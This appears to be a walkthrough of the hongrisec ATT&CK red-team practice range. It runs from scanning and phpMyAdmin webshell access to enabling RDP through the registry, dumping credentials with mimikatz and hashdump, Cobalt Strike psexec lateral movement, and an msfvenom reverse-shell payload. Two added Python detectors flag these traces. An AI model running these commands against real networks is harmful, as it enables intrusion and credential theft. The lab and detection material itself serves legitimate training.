Preface
Download address of the target machines: ATT&CK Red Team Evaluation practical range.
Topology diagram:
This vulnerability range is built to simulate a real environment and the full ATT&CK attack chain, forming a complete closed loop. The default password of the virtual machines is hongrisec@2019.
Environment setup
Name | Host | Password | Description |
---|---|---|---|
windows7 | 192.168.93.160/24, 192.168.142.128/24 | hongrisec@2019 | Web server |
win2K2 | 192.168.142.129/24 | hongrisec@2020 | Domain member |
windows server 2008 r2 | 192.168.142.130/24 | hongrisec@2020 | Domain controller |
time | 192.168.93.129/24 | time | Attacker |
Test network connectivity
windows7 pings win2k2 and windows server 2012. Here win2k2 pings the Kali machine and the web server; because win7 has its firewall enabled, the ping does not get through.
Intranet penetration
Information gathering
Detect live hosts on the same network segment
nmap -sT 192.168.93.160
Port scan
nmap -sT 192.168.68.160
Operating system and service versions
nmap -T4 -A 192.168.93.160
Exploit the available ports
The earlier scan shows that port 80 is open, so we visit it directly.
A PHP probe page was found here, which already exposes the basic server information. Still, it is worth scanning for more.
Looking around, there is still no website directory visible, so we scan for one with a tool; the tool used here is dirsearch:
./dirsearch.py -u 192.168.93.160 -e *
Vulnerability 1: Information disclosure + weak password
Vulnerability 2: Stored XSS
The submission has to be reviewed in the admin backend before the administrator cookie can be obtained.
Vulnerability 3: Arbitrary file modification
Connect directly with AntSword.
Vulnerability 4: phpMyAdmin file write
Getting a shell through phpMyAdmin: see the reference link.
The absolute web path is exposed by the PHP probe.
Then, following the article above, getshell.
Remote Connection
All of this was done on win7 without entering the intranet behind it at all. Use the AntSword terminal to check the open ports, add a user on win7, and then connect to the desktop remotely over 3389:
Port 3389 is not open here, so a quick search gives the registry change that enables it:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Next, create a user and add it to the Administrators group to get the needed permission.
Turn off the firewall first.
Reference article: Intranet penetration learning navigation
Domain information collection
1. What is a domain
A domain is a form of computer network in which all user accounts, computers, printers, and other security principals are registered in a central database located on one or more clusters of central computers called domain controllers. Authentication takes place on the domain controller. Each person who uses a computer in the domain receives a unique user account, which can then be assigned access to resources in the domain. Starting from Windows Server 2003, Active Directory is the Windows component responsible for maintaining this central database. The concept of a Windows domain is in contrast to the concept of a workgroup, in which each computer maintains its own security principal database.
On Kali, first start Cobalt Strike: start the team server, then the client. Under Attacks -> Packages -> Windows Executable(s), select the listener and generate the payload; save the output as a txt file and run it in PowerShell on the host.
The beacon comes online successfully.
Determine whether there is a domain
Use ipconfig /all to view the DNS server:
shell ipconfig /all
The DNS server name is god.org. Check the domain information with net view:
shell net view
View the primary domain information with net view /domain:
shell net view /domain
Query the current login domain and user information with net config workstation:
shell net config workstation
This shows clearly whether the host is in a domain.
Use the hashdump module (Access -> Dump Hashes) to export the password hashes and obtain credentials.
Use the logonpasswords module, which calls the mimikatz built into CS, to export the plaintext passwords and hashes held in memory by the lsass.exe process.
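The RDP-enabling registry change in the Remote Connection section and the net-based domain discovery commands above are exactly the command lines a defender would want to alert on. As an added example (not part of the original post), the following Python snippet runs simple command-line rules over constructed sample process-creation records; the host names, users and record format are assumptions.

```python
import re

# Constructed sample process-creation records (not real telemetry), one per line
# as "host|user|command line". They mirror the commands used in this walkthrough.
SAMPLE_EVENTS = r"""
WIN7|WIN7\Administrator|cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
WIN7|WIN7\Administrator|net view /domain
WIN7|WIN7\Administrator|net config workstation
WIN7|WIN7\Administrator|ipconfig /all
WIN7|GOD\alice|reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
WIN7|GOD\alice|notepad.exe report.txt
"""

# Each rule is (name, regex over the quote-stripped command line).
RULES = [
    # reg add ... Terminal Server ... fDenyTSConnections ... /d 0 : RDP switched on
    ("rdp_enabled_via_registry",
     re.compile(r"\breg(\.exe)?\s+add\b.*terminal\s*server.*fdenytsconnections.*/d\s+0+(\s|$)", re.I)),
    # net view /domain : domain enumeration from a freshly compromised host
    ("domain_discovery_net_view",
     re.compile(r"\bnet1?(\.exe)?\s+view\s+/domain\b", re.I)),
    # net config workstation : reveals logon domain and workstation domain
    ("domain_discovery_net_config",
     re.compile(r"\bnet1?(\.exe)?\s+config\s+workstation\b", re.I)),
]


def detect(events_text):
    """Return a list of (host, user, rule_name) hits for the given records."""
    hits = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        host, user, cmd = line.split("|", 2)
        # Drop quotes so both  "Terminal Server"  and the  Terminal" "Server
        # spelling used in the walkthrough normalise to the same text.
        norm = cmd.replace('"', "")
        for name, pattern in RULES:
            if pattern.search(norm):
                hits.append((host, user, name))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```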
Lateral movement
The next step is lateral movement. Because the internal network machines cannot reach the external network directly, win7 is used as a pivot.
From the official documentation: the SMB Beacon uses named pipes to communicate through a parent Beacon. When two Beacons are linked, the child Beacon gets its tasks from the parent Beacon and sends its output back through it.
Because linked Beacons communicate over Windows named pipes, the traffic is encapsulated in the SMB protocol, which makes the SMB Beacon comparatively stealthy and often effective for getting past a firewall.
First create a new listener,
then use the host information and credentials obtained earlier to log in with the psexec module.
The beacon comes online successfully.
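The credential dumping from lsass.exe and the SMB Beacon / psexec lateral movement described above each leave host-level traces: a process opening lsass with read access (Sysmon event 10), a named pipe created with a Cobalt Strike default name (Sysmon event 17), and a new service whose binary was dropped into ADMIN$ (System event 7045). As an added example, not code from the original post, this Python snippet triages constructed Sysmon-style records for those three traces; the event field names, the allowlist and the default pipe patterns are assumptions (the pipe and service names are Cobalt Strike defaults that a Malleable C2 profile can change).

```python
import re

PROCESS_VM_READ = 0x0010  # access bit needed to read lsass memory
# Illustrative allowlist of legitimate lsass readers; tune for the environment.
LSASS_READERS_OK = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
# Cobalt Strike default SMB beacon / post-ex pipe names (configurable in the profile).
CS_PIPE_DEFAULTS = re.compile(r"^\\(msagent_[0-9a-f]{2}|postex_[0-9a-f]{4}|status_[0-9a-f]{2})$", re.I)
# psexec-style service whose image is a random 7-char exe pushed to ADMIN$.
ADMIN_SHARE_SVC = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\[0-9a-z]{7}\.exe$", re.I)

# Constructed sample events (not real telemetry) in a simplified Sysmon-like shape.
SAMPLE_EVENTS = [
    {"id": 10, "host": "WIN7", "image": r"C:\Users\Public\artifact.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1010"},
    {"id": 10, "host": "WIN7", "image": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1000"},
    {"id": 17, "host": "WIN2K2", "image": r"C:\Windows\System32\rundll32.exe", "pipe": r"\msagent_1a"},
    {"id": 17, "host": "WIN2K2", "image": r"C:\Windows\System32\spoolsv.exe", "pipe": r"\spoolss"},
    {"id": 7045, "host": "WIN2K2", "service": "f3a9c1b", "image": r"\\127.0.0.1\ADMIN$\f3a9c1b.exe"},
    {"id": 7045, "host": "WIN2K2", "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
]


def triage(events):
    """Return (host, alert_name, detail) tuples for events matching the three traces."""
    alerts = []
    for ev in events:
        if ev["id"] == 10 and ev["target"].lower().endswith(r"\lsass.exe"):
            reads_memory = int(ev["access"], 16) & PROCESS_VM_READ
            if reads_memory and ev["image"].lower() not in LSASS_READERS_OK:
                alerts.append((ev["host"], "lsass_memory_read", ev["image"]))
        elif ev["id"] == 17 and CS_PIPE_DEFAULTS.match(ev["pipe"]):
            alerts.append((ev["host"], "cobaltstrike_default_smb_pipe", ev["pipe"]))
        elif ev["id"] == 7045 and ADMIN_SHARE_SVC.match(ev["image"]):
            alerts.append((ev["host"], "service_binary_in_admin_share", ev["service"]))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```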
MSF reverse shell
Reference article: Link to
Implant a Windows backdoor:
Payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Configure the handler in msfconsole and execute the payload on windows7.